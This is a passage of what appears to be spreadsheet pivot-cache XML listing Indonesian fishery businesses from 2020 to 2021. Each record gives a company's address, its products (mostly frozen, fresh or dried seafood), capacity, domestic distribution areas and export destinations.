    <s v="Jl. Kapuk Kamal VII No.73 RT 3 RW 3, Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Sebelah, Kerapu, Monkfish, Kakap, Seabass)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara, Kota Tangerang"/>
    <s v="Australia, China, India, Japan, Korea, Democratic People's Republic of, Norway, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21648"/>
    <x v="560"/>
    <s v="CV. MAJU JAYA BERKAT SEJAHTERA"/>
    <s v="Jl. Kapuk Kamal VII No.73 RT 3 RW 3, Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Makerel, Salem, Sarden)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <s v="Australia, China, India, Japan, Korea, Democratic People's Republic of, Norway, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21649"/>
    <x v="560"/>
    <s v="CV. MAJU JAYA BERKAT SEJAHTERA"/>
    <s v="Jl. Kapuk Kamal VII No.73 RT 3 RW 3, Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <s v="Australia, China, India, Japan, Korea, Democratic People's Republic of, Norway, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21650"/>
    <x v="560"/>
    <s v="CV. MAJU JAYA BERKAT SEJAHTERA"/>
    <s v="Jl. Kapuk Kamal VII No.73 RT 3 RW 3, Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="Australia, China, India, Japan, Korea, Democratic People's Republic of, Norway, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21651"/>
    <x v="561"/>
    <s v="CV. DAYA HASIL LAUT CILACAP"/>
    <s v="Jl. Majapahit No.1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap, Kota Yogyakarta"/>
    <s v="China, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21652"/>
    <x v="561"/>
    <s v="CV. DAYA HASIL LAUT CILACAP"/>
    <s v="Jl. Majapahit No.1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Lobster Hidup"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap, Kota Yogyakarta"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21653"/>
    <x v="561"/>
    <s v="CV. DAYA HASIL LAUT CILACAP"/>
    <s v="Jl. Majapahit No.1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Segar"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap, Kota Yogyakarta"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21654"/>
    <x v="561"/>
    <s v="CV. DAYA HASIL LAUT CILACAP"/>
    <s v="Jl. Majapahit No.1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Segar (Kerapu, Layur, Bawal, Samge, Kuro, Kurisi)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap, Kota Yogyakarta"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21655"/>
    <x v="561"/>
    <s v="CV. DAYA HASIL LAUT CILACAP"/>
    <s v="Jl. Majapahit No.1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Panni, Tongkol, Kembung, Salem, Cakalang, Tenggiri, Lemadang)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap, Kota Yogyakarta"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21656"/>
    <x v="561"/>
    <s v="CV. DAYA HASIL LAUT CILACAP"/>
    <s v="Jl. Majapahit No.1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap, Kota Yogyakarta"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21657"/>
    <x v="561"/>
    <s v="CV. DAYA HASIL LAUT CILACAP"/>
    <s v="Jl. Majapahit No.1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Lobster Beku"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap, Kota Yogyakarta"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21658"/>
    <x v="561"/>
    <s v="CV. DAYA HASIL LAUT CILACAP"/>
    <s v="Jl. Majapahit No.1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap, Kota Yogyakarta"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21659"/>
    <x v="561"/>
    <s v="CV. DAYA HASIL LAUT CILACAP"/>
    <s v="Jl. Majapahit No.1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Lemadang, Bawal, Samge, Kuro, Kurisi)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap, Kota Yogyakarta"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21660"/>
    <x v="561"/>
    <s v="CV. DAYA HASIL LAUT CILACAP"/>
    <s v="Jl. Majapahit No 1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Mata Besar, Tongkol, Kembung, Salem, Cakalang, Tenggiri, Lemadang)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap, Kota Yogyakarta"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21664"/>
    <x v="177"/>
    <s v="PT, LONTARA JAYA SAKTI"/>
    <s v="Jl, Pasar Ikan Beba, Kel, Tamasaju, Kec, Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Layaran, Sarden, Layang, Cakalang)"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="21665"/>
    <x v="177"/>
    <s v="PT, LONTARA JAYA SAKTI"/>
    <s v="Jl, Pasar Ikan Beba, Kel, Tamasaju, Kec, Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Katamba, Lencam, Sebelah, Kerapu, Layur, Sukang, Kakatua, Kakap, Kurisi)"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21666"/>
    <x v="177"/>
    <s v="PT, LONTARA JAYA SAKTI"/>
    <s v="Jl, Pasar Ikan Beba, Kel, Tamasaju, Kec, Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-Cumi)"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21667"/>
    <x v="177"/>
    <s v="PT. LONTARA JAYA SAKTI"/>
    <s v="Jl. Pasar Ikan Beba, Kel. Tamasaju, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21668"/>
    <x v="177"/>
    <s v="PT. LONTARA JAYA SAKTI"/>
    <s v="Jl. Pasar Ikan Beba, Kel. Tamasaju, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Segar"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21669"/>
    <x v="562"/>
    <s v="CV. SUMBER BAHARI MANDIRI"/>
    <s v="Jl. Kapasa Raya No.34, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Teripang Kering"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="21670"/>
    <x v="562"/>
    <s v="CV. SUMBER BAHARI MANDIRI"/>
    <s v="Jl. Kapasa Raya No.34, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Abalone Kering"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Hong Kong, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="21671"/>
    <x v="562"/>
    <s v="CV. SUMBER BAHARI MANDIRI"/>
    <s v="Jl. Kapasa Raya No.34, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="21672"/>
    <x v="562"/>
    <s v="CV. SUMBER BAHARI MANDIRI"/>
    <s v="Jl. Kapasa Raya No.34, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Hong Kong, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="21673"/>
    <x v="562"/>
    <s v="CV. SUMBER BAHARI MANDIRI"/>
    <s v="Jl. Kapasa Raya No.34, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Hong Kong, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="21674"/>
    <x v="562"/>
    <s v="CV. SUMBER BAHARI MANDIRI"/>
    <s v="Jl. Kapasa Raya No.34, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="21677"/>
    <x v="563"/>
    <s v="PT. HASIL ALAM SAMUDERA"/>
    <s v="Jl. Muara Baru Ujung Blok D/6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-Cumi)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="1200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="21678"/>
    <x v="564"/>
    <s v="PT. INDO LAUTAN MAS"/>
    <s v="Kel. Manembo Nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Panni, Tongkol, Malalugis, Maesang, Layang, Cakalang)"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21679"/>
    <x v="563"/>
    <s v="PT. HASIL ALAM SAMUDERA"/>
    <s v="Jl. Muara Baru Ujung Blok D/6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Salem)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="1200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Karawang, Kota Bogor, Kota Sukabumi, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="21686"/>
    <x v="559"/>
    <s v="PT. SURI TANI PEMUKA"/>
    <s v="Jl. Mundu Pesisir No. 33 Km 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Air Tawar Beku (Patin, Nila)"/>
    <d v="2020-09-17T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21687"/>
    <x v="559"/>
    <s v="PT. SURI TANI PEMUKA"/>
    <s v="Jl. Mundu Pesisir No. 33 Km 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-09-17T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21688"/>
    <x v="559"/>
    <s v="PT. SURI TANI PEMUKA"/>
    <s v="Jl. Mundu Pesisir No. 33 Km 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Produk Perikanan Bernilai Tambah Beku  (Tempura, Ikan Berlapis Tepung, Kabayaki, Katsu, Siomay, Karage, Burger, Otak-otak, Naget, Bakso, Pempek) "/>
    <d v="2020-09-17T00:00:00"/>
    <n v="1403802"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bandung, Kota Bogor, Kota Bekasi, Kota Tangerang Selatan"/>
    <s v="Brunei Darussalam, Japan, Malaysia, Philippines, Saudi Arabia, Singapore, Thailand, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="21691"/>
    <x v="565"/>
    <s v="PT. ARIAKE EUROPE INDONESIA"/>
    <s v="Kawasan Greenland International Industrial Center (GIIC) Blok CF No.7 Kota Deltamas, Kel. Pasir Ranji, Kec. Cikarang Pusat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tepung Udang"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="924000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21692"/>
    <x v="565"/>
    <s v="PT. ARIAKE EUROPE INDONESIA"/>
    <s v="Kawasan Greenland International Industrial Center (GIIC) Blok CF No.7 Kota Deltamas, Kel. Pasir Ranji, Kec. Cikarang Pusat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kecap Udang"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21693"/>
    <x v="565"/>
    <s v="PT. ARIAKE EUROPE INDONESIA"/>
    <s v="Kawasan Greenland International Industrial Center (GIIC) Blok CF No.7 Kota Deltamas, Kel. Pasir Ranji, Kec. Cikarang Pusat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ekstrak Udang"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="924000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21694"/>
    <x v="565"/>
    <s v="PT. ARIAKE EUROPE INDONESIA"/>
    <s v="Kawasan Greenland International Industrial Center (GIIC) Blok CF No.7 Kota Deltamas, Kel. Pasir Ranji, Kec. Cikarang Pusat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tepung Krill"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="16000"/>
    <m/>
    <s v="Japan, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21695"/>
    <x v="565"/>
    <s v="PT. ARIAKE EUROPE INDONESIA"/>
    <s v="Kawasan Greenland International Industrial Center (GIIC) Blok CF No.7 Kota Deltamas, Kel. Pasir Ranji, Kec. Cikarang Pusat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ekstrak Krill"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="270000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21696"/>
    <x v="565"/>
    <s v="PT. ARIAKE EUROPE INDONESIA"/>
    <s v="Kawasan Greenland International Industrial Center (GIIC) Blok CF No.7 Kota Deltamas, Kel. Pasir Ranji, Kec. Cikarang Pusat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Minyak Perisa Udang"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="155000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21697"/>
    <x v="565"/>
    <s v="PT. ARIAKE EUROPE INDONESIA"/>
    <s v="Kawasan Greenland International Industrial Center (GIIC) Blok CF No.7 Kota Deltamas, Kel. Pasir Ranji, Kec. Cikarang Pusat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Krill Beku"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="270000"/>
    <m/>
    <s v="Japan, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21704"/>
    <x v="566"/>
    <s v="PT. KELOLA MINA LAUT UNIT KENDARI"/>
    <s v="Kompleks Pelabuhan Perikanan Samudera Jl. Samudera No. 1, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="125000"/>
    <s v="Kabupaten Gresik"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21705"/>
    <x v="566"/>
    <s v="PT. KELOLA MINA LAUT UNIT KENDARI"/>
    <s v="Kompleks Pelabuhan Perikanan Samudera Jl. Samudera No. 1, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="55250"/>
    <s v="Kabupaten Gresik"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21706"/>
    <x v="566"/>
    <s v="PT. KELOLA MINA LAUT UNIT KENDARI"/>
    <s v="Kompleks Pelabuhan Perikanan Samudera Jl. Samudera No. 1, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakatua, Kakap, Layur)"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="45250"/>
    <s v="Kabupaten Gresik"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21707"/>
    <x v="533"/>
    <s v="CV. SINAR MUTIARA ABADI"/>
    <s v="Jl. Gajah Mada Km 4, Kel. Banyudono, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Surimi Beku"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="25000000"/>
    <s v="Kota Medan, Kota Jakarta Utara, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21708"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Beku"/>
    <d v="2020-08-07T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21712"/>
    <x v="567"/>
    <s v="CV. MULTI LAUTAN MAS"/>
    <s v="Ruko Prancis 77 Blok A1 Jl. Raya Prancis, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Segar (Kerapu, Layur, Kakatua, Bawal, Kakap)"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Japan, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21713"/>
    <x v="567"/>
    <s v="CV. MULTI LAUTAN MAS"/>
    <s v="Ruko Prancis 77 Blok A1 Jl. Raya Prancis, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Segar"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21714"/>
    <x v="567"/>
    <s v="CV. MULTI LAUTAN MAS"/>
    <s v="Ruko Prancis 77 Blok A1 Jl. Raya Prancis, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Segar (Tongkol, Marlin, Tenggiri, Kuro)"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Japan, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21715"/>
    <x v="567"/>
    <s v="CV. MULTI LAUTAN MAS"/>
    <s v="Ruko Prancis 77 Blok A1 Jl. Raya Prancis, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Segar"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Japan, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21716"/>
    <x v="567"/>
    <s v="CV. MULTI LAUTAN MAS"/>
    <s v="Ruko Prancis 77 Blok A1 Jl. Raya Prancis, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Hidup"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21717"/>
    <x v="567"/>
    <s v="CV. MULTI LAUTAN MAS"/>
    <s v="Ruko Prancis 77 Blok A1 Jl. Raya Prancis, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sidat Hidup"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Japan, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21718"/>
    <x v="567"/>
    <s v="CV. MULTI LAUTAN MAS"/>
    <s v="Ruko Prancis 77 Blok A1 Jl. Raya Prancis, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Hidup (Kerapu, Kakatua, Bawal, Kakap)"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Japan, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21719"/>
    <x v="568"/>
    <s v="ALANG ALANG TUMBUH SUBUR"/>
    <s v="Dk. Ringinsari RT 03 RW 02, Kel. Randusari, Kec. Teras, Kabupaten Boyolali&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Abon Ikan"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="2400"/>
    <s v="Kabupaten Boyolali, Kabupaten Semarang, Kota Magelang, Kota Surakarta, Kota Salatiga, Kota Semarang, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="21720"/>
    <x v="569"/>
    <s v="KOPERASI PUSKOPAL MABESAL"/>
    <s v="Jl. Husein Sastranegara Komplek Pergudangan Nusa Indah B/37 RT 004 RW 003, Kel. Jurumudi, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Salem, Sarden)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21721"/>
    <x v="570"/>
    <s v="CV. AZRA SENTOSA JAYA"/>
    <s v="Jl. Strat 2 RT 17 No.30, Kel. Gunung Samarinda, Kec. Balikpapan Utara, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Abon Kepiting"/>
    <d v="2020-08-05T00:00:00"/>
